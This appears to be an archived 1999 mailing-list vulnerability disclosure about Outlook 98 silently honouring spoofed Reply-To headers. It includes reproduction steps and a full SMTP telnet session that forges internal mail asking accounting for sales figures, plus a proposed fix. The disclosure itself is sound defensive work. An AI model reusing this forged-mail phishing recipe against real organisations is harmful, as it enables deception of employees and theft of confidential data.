Outlook 98 allows spoofing internal users

From: Nate Lawson (nateat_private)
Date: Tue Apr 20 1999 - 15:10:05 PDT

Next message: Richard Ford: "Re: "Shopping Carts exposing CC data""

Previous message: aleph1at_private: "Microsoft Security Bulletin (MS99-012)"
Next in thread: Peter van Dijk: "Re: Outlook 98 allows spoofing internal users"
Reply: Peter van Dijk: "Re: Outlook 98 allows spoofing internal users"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Problem: Outlook uses a sender's Reply-To address silently, allowing
         a user to inadvertently send data to an Internet mail account
         when intending to reply to an internal, trusted user.

Impact: Anyone on the Internet can spoof a trusted internal Exchange user
        and get replies sent back to themself without the user knowing they
        weren't responding to another internal user.

How to reproduce:

1.  Spoof mail as an internal user with a Reply-To address claiming to be
    an internal user, but an address of an Internet account, say hotmail.
2.  Go into Outlook and read the mail.  The mail looks like it was internally
    generated but viewing the full Internet headers under View->Options
    shows the bogus Reply-To header.
3.  Hit Reply in Outlook.  The To: field looks like it's going to a valid
    internal user, but right clicking on it and choosing Properties shows
    that the internal user it is sending the reply to is actually an Internet
    address.
4.  Enter some text and hit Send.  Observe that the mail went to the attacker's
    account, not the internal one.

A quick script:

{root 5:00pm} ~> telnet mail.example.com 25
Trying 10.20.2.5...
Connected to mail.example.com.
Escape character is '^]'.
220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
helo losebag
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<accountingat_private>
250 OK - Recipient <accountingat_private>
data
354 Send data.  End with CRLF.CRLF
From: Nate Lawson
To: Accounting
Reply To: Nate Lawson<intruderat_private>
Subject: important!

Please reply with the latest copy of our sales figures!

Thanks,
Nate
.
250 OK
quit
221 closing connection
Connection closed by foreign host.

Now, a reply to the email will go not to the trusted internal user Nate
Lawson <nlawsonat_private> but to the attacker, <intruderat_private>.
Worse, the user sees no indication that the mail is outward-bound!  The
To: field on the reply simply shows "Nate Lawson", a valid internal user.

Affected programs:  Only tested on Outlook 98

Known use of this bug to get confidential information:  none yet

Suggested Fix: always show the full email address of any recipient that is
not local (i.e. usernameat_private would be hidden but any instance of
userat_private would be shown)

Microsoft has been notified, but claimed this was a weakness in SMTP and
would not be fixed until a secure successor to SMTP is implemented. They
obviouly missed the point -- the error is not in that mail can be forged,
but that Outlook allows a user to respond to a message that looks local
and legitimate, but is actually destined for an outside address.

-Nate

Next message: Richard Ford: "Re: "Shopping Carts exposing CC data""
Previous message: aleph1at_private: "Microsoft Security Bulletin (MS99-012)"
Next in thread: Peter van Dijk: "Re: Outlook 98 allows spoofing internal users"
Reply: Peter van Dijk: "Re: Outlook 98 allows spoofing internal users"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:21 PDT